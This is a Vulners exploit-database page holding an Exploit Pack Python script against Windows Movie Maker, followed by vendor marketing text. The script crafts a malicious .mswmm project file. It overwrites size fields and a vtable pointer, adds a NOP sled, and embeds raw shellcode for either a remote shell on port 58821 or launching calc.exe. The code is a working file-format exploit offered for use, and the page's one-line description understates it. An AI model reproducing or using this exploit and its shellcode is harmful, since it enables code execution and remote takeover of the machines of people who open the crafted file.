Lucene search
K

Windows-Movie-Maker

🗓️ 04 Sep 2010 00:00:00Reported by ShahinType 
exploitpack
 exploitpack
👁 18 Views

Python script for handling shellcode and file operations, takes input for target, port, and shellcode type

Code
import sys
import os

Target = sys.argv[1]
Port = int(sys.argv[2])
ShellcodeType = sys.argv[3]

def main():

    try:
        rpath = 'exploits/code/data/src.mswmm'
        fdR = open(rpath, 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:9976]
        str2 = strTotal[9980:10104]
        str3 = strTotal[10108:16496]
       	str4 = strTotal[17620:]		
        size_first_new = "\x20\x00\x00\x00" # size of first new()
        size_second_new = "\x11\x11\x00\x00" # size of second new()		
        p2p = "\x71\xb5\x06\x77" # vtable fake pointer from resource section COMRes -8 to jmp EBX 
		
        # Shellcode port 58821
        remoteshell=("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
        "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
        "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
        "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
        "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
        "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
        "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
        "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
        "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
        "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
        "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
        "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
        "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
        "\xdb\x53\x68\x02\x00\xe5\xc5\x89\xe6\x6a\x10\x56\x57\x68" +
        "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
        "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
        "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
        "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
        "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
        "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
        "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
        "\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5" +
        "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
        "\x6a\x00\x53\xff\xd5")
		
        # Exec calc.exe
        executecode=("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
        "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
        "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
        "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
        "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
        "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
        "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
        "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
        "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
        "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
        "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
        "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
        "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
        "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
        "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
        "\x51\x6b\x28")

        if ShellcodeType == "R":
       	  Shellcode=remoteshell
        if ShellcodeType == "E":
          Shellcode=executecode
        if ShellcodeType == "C":
          Shellcode=executecode
        if ShellcodeType == "L":
          Shellcode=executecode	
			
        if len(Shellcode) > 1120:
          print "[*] Error : Shellcode length is long"
          return
        if len(Shellcode) <= 1120:
          dif = 1120- len(Shellcode)
          while dif > 0 :
            Shellcode += '\x90'
            dif = dif - 1
        path = 'exploits/code/output/exploit.mswmm'
        print "HOLA"	
        fdW = open(path,mode='wb')		
        fdW.write(str1)
        fdW.write(size_first_new)
        fdW.write(str2)
        fdW.write(size_second_new)
        fdW.write(str3)
        fdW.write(p2p)
        fdW.write('\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90')     # padding		
        fdW.write(Shellcode)
        fdW.write(str4)		
        fdW.close()
        fdR.close()
    except IOError as (errno, strerror):
        print "I/O error({0}): {1}".format(errno, strerror)
    except ValueError:
        print "Could not convert data to an integer."
    except:
        print "Unexpected error:", sys.exc_info()[0]
        raise
if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2010 00:00Current
0.9Low risk
Vulners AI Score0.9
18